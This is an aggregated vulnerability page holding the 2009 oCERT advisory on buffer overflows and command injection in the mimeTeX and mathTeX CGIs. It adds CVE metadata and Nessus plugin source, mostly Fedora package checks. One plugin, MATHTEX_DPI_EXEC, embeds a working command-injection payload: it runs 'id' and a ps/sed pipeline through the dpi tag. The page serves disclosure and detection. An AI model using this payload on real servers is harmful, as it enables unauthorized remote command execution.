[oCERT-2009-010] mimeTeX and mathTeX buffer overflows and command injection
2009-07-16T00:00:00
ID SECURITYVULNS:DOC:22175 Type securityvulns Reporter Securityvulns Modified 2009-07-16T00:00:00
Description
2009-010 mimeTeX and mathTeX buffer overflows and command injection
Description:
The mimeTeX and mathTeX CGIs are widely used helper executables that allow
mathematical equation rendering in the form of images. Both applications suffer
from several buffer overflows as well as command injection which result in
remote code execution.
The mimeTeX application suffers from several stack-based buffer overflows which
can be remotely triggered by passing oversized TeX expressions. Additionally
the \environ, \input and \counter directives may not be suitable for exposure
to commands from the Internet.
Similarly the mathTeX application does not perform sufficient input
sanitization and allows untrusted input, passed via HTTP query strings, to be
used as command arguments allowing command injection. Additionally it suffers
from several stack-based overflows as well as insecure temporary file handling.
Affected version:
Unfortunately mimeTeX and mathTex are provided without version numbers by the
maintainer, who releases version-less zip archives. It is therefore impossible
to provide affected version numbers.
Fixed version:
At the release time for this advisory both versions available on the maintainer
website fix the overflow and injection issues.
mimeTeX, mimetex.zip (2009/07/13)
mathTeX, mathtex.zip (2009/07/13)
Credit: vulnerability report received from Chris Evans <cevans [at] google
[dot] com> (mimetex) and Damien Miller <djm [at] google [dot] com>
(mathtex), Google Security Team.
--
Andrea Barisani | Founder & Project Coordinator
oCERT | Open Source Computer Emergency Response Team
<lcars@ocert.org> http://www.ocert.org
0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E
"Pluralitas non est ponenda sine necessitate"
{"id": "SECURITYVULNS:DOC:22175", "bulletinFamily": "software", "title": "[oCERT-2009-010] mimeTeX and mathTeX buffer overflows and command injection", "description": "\r\n#2009-010 mimeTeX and mathTeX buffer overflows and command injection\r\n\r\nDescription:\r\n\r\nThe mimeTeX and mathTeX CGIs are widely used helper executables that allow\r\nmathematical equation rendering in the form of images. Both applications suffer\r\nfrom several buffer overflows as well as command injection which result in\r\nremote code execution.\r\n\r\nThe mimeTeX application suffers from several stack-based buffer overflows which\r\ncan be remotely triggered by passing oversized TeX expressions. Additionally\r\nthe \environ, \input and \counter directives may not be suitable for exposure\r\nto commands from the Internet.\r\n\r\nSimilarly the mathTeX application does not perform sufficient input\r\nsanitization and allows untrusted input, passed via HTTP query strings, to be\r\nused as command arguments allowing command injection. Additionally it suffers\r\nfrom several stack-based overflows as well as insecure temporary file handling.\r\n\r\nAffected version:\r\n\r\nUnfortunately mimeTeX and mathTex are provided without version numbers by the\r\nmaintainer, who releases version-less zip archives. It is therefore impossible\r\nto provide affected version numbers.\r\n\r\nFixed version:\r\n\r\nAt the release time for this advisory both versions available on the maintainer\r\nwebsite fix the overflow and injection issues.\r\n\r\nmimeTeX, mimetex.zip (2009/07/13)\r\n\r\nmathTeX, mathtex.zip (2009/07/13)\r\n\r\nCredit: vulnerability report received from Chris Evans <cevans [at] google\r\n [dot] com> (mimetex) and Damien Miller <djm [at] google [dot] com>\r\n (mathtex), Google Security Team.\r\n\r\nCVE: CVE-2009-1382 (mimetex), CVE-2009-1383 (mathtex)\r\n\r\nTimeline:\r\n\r\n2009-05-22: vulnerability report received\r\n2009-05-25: contacted mimetex/mathtex maintainer\r\n2009-05-25: maintainer publicly discloses report contents\r\n2009-05-26: contacted affected vendors\r\n2009-05-26: maintainer provides updated packages\r\n2009-05-26: assigned CVEs\r\n2009-05-26: reporters indicate that the updated packages do not fix all\r\n the issues\r\n2009-05-29: reporters find additional overflows in updated packages\r\n2009-06-01: maintainer contacted with updated report\r\n2009-07-09: reporters confirm that updated packages fixing the reported\r\n issues are available\r\n2009-07-13: advisory release\r\n\r\nReferences:\r\nhttp://scary.beasts.org/security/CESA-2009-009.html\r\nhttp://groups.google.com/group/comp.text.tex/browse_thread/thread/5d56d3d744351578\r\n\r\nPermalink:\r\nhttp://www.ocert.org/advisories/ocert-2009-010.html\r\n\r\n-- \r\nAndrea Barisani | Founder & Project Coordinator\r\n oCERT | Open Source Computer Emergency Response Team\r\n\r\n<lcars@ocert.org> http://www.ocert.org\r\n 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E\r\n "Pluralitas non est ponenda sine necessitate"", "published": "2009-07-16T00:00:00", "modified": "2009-07-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22175", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2009-1383", "CVE-2009-1382"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:31", "edition": 1, "viewCount": 22, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2018-08-31T11:10:31", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1383", "CVE-2009-1382"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10074"]}, {"type": "nessus", "idList": ["UBUNTU_USN-844-1.NASL", "DEBIAN_DSA-1917.NASL", "FEDORA_2013-3902.NASL", "FEDORA_2009-10225.NASL", "FEDORA_2009-10170.NASL", "FEDORA_2013-3910.NASL", "FEDORA_2010-6546.NASL", "MATHTEX_DPI_EXEC.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310865498", "OPENVAS:66101", "OPENVAS:861871", "OPENVAS:136141256231066192", "OPENVAS:66192", "OPENVAS:65751", "OPENVAS:1361412562310865492", "OPENVAS:136141256231066196", "OPENVAS:66196", "OPENVAS:865498"]}, {"type": "ubuntu", "idList": ["USN-844-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1917-1:5C54B"]}], "modified": "2018-08-31T11:10:31", "rev": 2}, "vulnersScore": 7.1}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T05:40:01", "description": "The getdirective function in mathtex.cgi in mathTeX, when downloaded before 20090713, allows remote attackers to execute arbitrary commands via shell metacharacters in the dpi tag.", "edition": 4, "cvss3": {}, "published": "2009-07-14T20:30:00", "title": "CVE-2009-1383", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1383"], "modified": "2018-10-10T19:36:00", "cpe": ["cpe:/a:forkosh:mathtex:-"], "id": "CVE-2009-1383", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1383", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:forkosh:mathtex:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:01", "description": "Multiple stack-based buffer overflows in mimetex.cgi in mimeTeX, when downloaded before 20090713, allow remote attackers to execute arbitrary code via a TeX file with long (1) picture, (2) circle, or (3) input tags.", "edition": 6, "cvss3": {}, "published": "2009-07-14T20:30:00", "title": "CVE-2009-1382", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1382"], "modified": "2018-10-10T19:36:00", "cpe": ["cpe:/a:forkosh:mimetex:1.71"], "id": "CVE-2009-1382", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1382", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:forkosh:mimetex:1.71:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-1383", "CVE-2009-1382"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2009-07-16T00:00:00", "published": "2009-07-16T00:00:00", "id": "SECURITYVULNS:VULN:10074", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10074", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-20T12:06:58", "description": "The remote web server hosts mathTeX, a CGI script for displaying math\non the web.\n\nThe version of this application installed on the remote host fails to\nsanitize input via the 'dpi' or 'density' tags in an expression of\nshell metacharacters in the 'getdirective' function before using it\nin a call to the Perl 'system()' function.\n\nAn unauthenticated, remote attacker can leverage this issue to execute\narbitrary code on the remote host subject to the privileges under\nwhich the web server operates.", "edition": 27, "published": "2010-10-06T00:00:00", "title": "mathTeX mathtex.cgi getdirective Function dpi Tag Arbitrary Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1383"], "modified": "2010-10-06T00:00:00", "cpe": [], "id": "MATHTEX_DPI_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/49778", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(49778);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-1383\");\n script_bugtraq_id(43599);\n\n script_name(english:\"mathTeX mathtex.cgi getdirective Function dpi Tag Arbitrary Code Execution\");\n script_summary(english:\"Tries to run a command\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a CGI script that allows execution of\narbitrary commands.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote web server hosts mathTeX, a CGI script for displaying math\non the web.\n\nThe version of this application installed on the remote host fails to\nsanitize input via the 'dpi' or 'density' tags in an expression of\nshell metacharacters in the 'getdirective' function before using it\nin a call to the Perl 'system()' function.\n\nAn unauthenticated, remote attacker can leverage this issue to execute\narbitrary code on the remote host subject to the privileges under\nwhich the web server operates.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://ocert.org/advisories/ocert-2009-010.html\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/bugtraq/2009/Jul/75\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7e19804\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to a version of mathTeX released on or after July 13th, 2009.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(78);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\n\n\ncmd = 'id';\ncmd_pat = \"uid=[0-9]+.*gid=[0-9]+.*\";\n\nmagic = SCRIPT_NAME + '-' + unixtime();\nfind_file = 'ps ax | ' +\n 'fgrep \"' + magic + '\" | ' +\n 'egrep \"/[0-9a-fA-F]+\\\\.gif\" | ' +\n 'tail -1 | ' +\n 'sed -n -e \\'s/.*dvips.ps //\\' -e \\'s/gif >convert.*/gif/p\\' | tee /tmp/foo4';\n\nexploit = cmd + ' > $(' + find_file + ') | echo ' + magic + ' ';\nexpr = \"\\dvips\" +\n \"\\dpi{150|\" + urlencode(str:exploit) + \"}\";\n\n\n# Loop through directories.\nif (thorough_tests) dirs = list_uniq(make_list(\"/mathtex\", \"/cgi-bin/mathtex\", cgi_dirs()));\nelse dirs = make_list(cgi_dirs());\n\noutput = \"\";\nmathtex_installs = 0;\nvuln_urls = make_list();\n\nforeach dir (dirs)\n{\n foreach ext (make_list(\".cgi\", \".pl\"))\n {\n url = dir + '/mathtex' + ext + '?' + expr;\n\n res = http_send_recv3(port:port, method:\"GET\", item:url, exit_on_fail:TRUE);\n if (!res[2]) continue;\n\n headers = parse_http_headers(status_line:res[0], headers:res[1]);\n if (isnull(headers)) exit(1, 'Error parsing HTTP headers on port '+port+'.');\n\n # If the output looks like it's from the script...\n content_type = headers['content_type'];\n if (headers['content-type'] && 'image/gif' >< headers['content-type'])\n {\n mathtex_installs++;\n }\n # otherwise continue unless we're being paranoid.\n else if (report_paranoia < 2)\n {\n continue;\n }\n\n if (egrep(pattern:cmd_pat, string:res[2]))\n {\n vuln_urls = make_list(vuln_urls, url);\n if (!output) output = res[2];\n\n break;\n }\n }\n if (output && !thorough_tests) break;\n}\n\nif (max_index(vuln_urls))\n{\n if (report_verbosity > 0)\n {\n if (max_index(vuln_urls) == 1) s = '';\n else s = 's';\n header =\n \"Nessus was able to execute the command '\" + cmd + \"' on the remote\" + '\\n' +\n 'host using the following URL' + s;\n trailer = '';\n\n if (report_verbosity > 1)\n {\n trailer =\n 'This produced the following output :\\n' +\n '\\n' +\n crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n' +\n data_protection::sanitize_uid(output:output) +\n crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n' +\n '\\n';\n }\n trailer +=\n 'Note that some browsers will try to render the response from the URL' + s + '\\n' +\n 'above as an image and display an error rather than command output. If\\n' +\n 'this happens, try an alternate browser or send the request manually.\\n';\n\n report = get_vuln_report(items:vuln_urls, port:port, header:header, trailer:trailer);\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n if (mathtex_installs == 0) exit(0, \"No installs of mathTeX were found on the web server on port \"+port+\".\");\n else if (mathtex_installs == 1) exit(0, \"The mathTeX install hosted on the web server on port \"+port+\" is not affected.\");\n else exit(0, \"The mathTeX installs hosted on the web server on port \"+port+\" are not affected.\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:11:46", "description": "Fixes for CVE-2009-1382 CVE-2009-2459 for EL-5, update to latest\nupstream for all releases.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-03-24T00:00:00", "title": "Fedora 18 : mimetex-1.74-1.fc18 (2013-3910)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "modified": "2013-03-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:mimetex"], "id": "FEDORA_2013-3910.NASL", "href": "https://www.tenable.com/plugins/nessus/65663", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-3910.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65663);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_bugtraq_id(36631, 36632);\n script_xref(name:\"FEDORA\", value:\"2013-3910\");\n\n script_name(english:\"Fedora 18 : mimetex-1.74-1.fc18 (2013-3910)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixes for CVE-2009-1382 CVE-2009-2459 for EL-5, update to latest\nupstream for all releases.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=922139\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-March/100898.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7eceafb7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mimetex package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mimetex\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"mimetex-1.74-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mimetex\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:51", "description": " - Fixes a buffer-overflow as detailed in #511049. -\n Updates to 1.7.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2009-11-05T00:00:00", "title": "Fedora 11 : mimetex-1.71-1.fc11 (2009-10170)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "modified": "2009-11-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mimetex", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-10170.NASL", "href": "https://www.tenable.com/plugins/nessus/42374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-10170.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42374);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_bugtraq_id(36631, 36632);\n script_xref(name:\"FEDORA\", value:\"2009-10170\");\n\n script_name(english:\"Fedora 11 : mimetex-1.71-1.fc11 (2009-10170)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fixes a buffer-overflow as detailed in #511049. -\n Updates to 1.7.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511049\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-November/030661.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d0b72d51\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mimetex package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mimetex\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"mimetex-1.71-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mimetex\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:46", "description": "Fixes for CVE-2009-1382 CVE-2009-2459 for EL-5, update to latest\nupstream for all releases.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-03-24T00:00:00", "title": "Fedora 17 : mimetex-1.74-1.fc17 (2013-3902)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "modified": "2013-03-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:mimetex"], "id": "FEDORA_2013-3902.NASL", "href": "https://www.tenable.com/plugins/nessus/65662", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-3902.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65662);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_bugtraq_id(36631, 36632);\n script_xref(name:\"FEDORA\", value:\"2013-3902\");\n\n script_name(english:\"Fedora 17 : mimetex-1.74-1.fc17 (2013-3902)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixes for CVE-2009-1382 CVE-2009-2459 for EL-5, update to latest\nupstream for all releases.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=922139\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-March/100906.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1d44ffdc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mimetex package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mimetex\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 